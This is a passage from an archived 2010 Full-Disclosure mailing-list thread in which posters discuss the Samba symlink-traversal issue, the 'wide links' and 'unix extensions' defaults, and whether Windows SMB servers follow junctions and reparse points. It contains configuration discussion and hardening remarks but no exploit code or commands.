symlink. That doesn't mean there are no other imaginable vulnerabilities
stemming from filesystem objects that violate the notional tree
structure of the directory hierarchy.

The obvious one: someone shares a branch of the directory tree in the
belief that clients only have access to that part of the tree, but the
tree already contains a convenience symlink (Unix) or reparse point
(Windows) that points elsewhere in the hierarchy. That's one reason why
Samba has had the "wide links=no" option since, what, the mid-1990s.

--
Michael Wojcik
Principal Software Systems Developer, Micro Focus

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

David.Jacoby at truesec

Feb 9, 2010, 7:44 AM

Post #24 of 25 (2238 views)
Permalink

Re: Samba Remote Zero-Day Exploit [In reply to]

Hi FD,

This is not a zero-day vulnerability in the concept of a programmatic
Flaw. But if no one, or the majority of all Samba users never knew that
This option was available, or knew that this functionality was enabled
by default I think this problem should still be highlighted in the way
that the samba team did.

I think its good that people increase awareness of these type of problems
Because they are all over the place. Its also one of the reasons why its
So important to harden your default installation, because configuration options
Like this one tend to be enable by default.

I think it was a good finding and im glad that people are discussing it.

Best regards,
David Jacoby

-----Original Message-----
From: paul.szabo [at] sydney [mailto:paul.szabo [at] sydney]
Sent: den 6 februari 2010 22:48
To: bugtraq [at] securityfocus; full-disclosure [at] lists
Subject: Re: Samba Remote Zero-Day Exploit

I find it puzzling how this discussion, including the official Samba
response

http://www.samba.org/samba/news/symlink_attack.html

fails to consider whether the mentioned configuration (when admin sets
non-default "writeable = yes" but leaving default "wide links = yes")
allows write access to the whole filesystem (where the user has UNIX
rights). I also wonder about the interaction with the setting of "unix
extensions" (which I had set to non-default "no" to help Mac clients).

Cheers, Paul

Paul Szabo psz [at] maths http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

stefan.kanthak at nexgo

Feb 9, 2010, 12:53 PM

Post #25 of 25 (2249 views)
Permalink

Re: Samba Remote Zero-Day Exploit [In reply to]

Michael Wojcik wrote:

>> From: Stefan Kanthak [mailto:stefan.kanthak [at] nexgo]
>> Sent: Monday, 08 February, 2010 16:33
>>
>> Michael Wojcik wrote:
>>
>> >> From: Stefan Kanthak [mailto:stefan.kanthak [at] nexgo]
>> >> Sent: Saturday, 06 February, 2010 08:21
>> >>
>> >> Since Windows 2000 NTFS supports "junctions", which pretty much
>> >> resemble Unix symlinks, but only for directories.
>> >> See <http://support.microsoft.com/kb/205524/en-us>
>> >
>> > And at least since Vista, it also supports symlinks, which are
>> > designed
>>
>> s/at least//
>> [ well-known facts snipped ]
>
> So ... your original note about junctions did not cover "well-known
~~~~~~~~~~~~~
> facts", but my note about other reparse point types did?

It's best practice (see http://www.ietf.org/rfc/rfc1855.txt) not to
include unreferenced parts of the message to be answered. There's no
need to repeat undisputed and undoubtly correct facts.

>> > The Windows SMB server apparently won't cross reparse points,
>though,
>> > so there's no equivalent vulnerability.
>>
>> NO, Windows SMB server crosses reparse points!
>
> Not in my testing, at least not for junctions and symlinks.

I'm using junctions on Windows 2000/XP/2003 at least since 2002, and
of course they are traversed on shares too!

> User with
> requisite authority could traverse the junctions and symlinks locally,
> but not remotely via a share.

Test again!

>> But as Dan Kaminsky pointed out, you need to have administrative
>rights
>> to remotely create a junction on an SMB share, so the non-admin user
>> cant get himself access to files outside a share he's allowed to
>> access.
>
> Unless the reparse point already exists.

Of course, but that's not the question here.

> This particular exploit happened to involve a remote user creating a
> symlink.

Correct. But to accomplish that, the "unix extensions" need to be
enabled in the first place.

> That doesn't mean there are no other imaginable vulnerabilities
> stemming from filesystem objects that violate the notional tree
> structure of the directory hierarchy.
>
> The obvious one: someone shares a branch of the directory tree in the
> belief that clients only have access to that part of the tree, but the
> tree already contains a convenience symlink (Unix) or reparse point
> (Windows) that points elsewhere in the hierarchy. That's one reason why
> Samba has had the "wide links=no" option since, what, the mid-1990s.

I'm using Samba since 1993 and know that quite well.
You surely can find my name in some places in the docs and other files
of the distribution too.-)

Stefan

PS: would you mind to setup your Exchange Server correctly? It rebreaks
cited lines and destroys correct the quoting.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Index | Next | Previous | View Threaded

Interested in having your list archived? Contact Gossamer Threads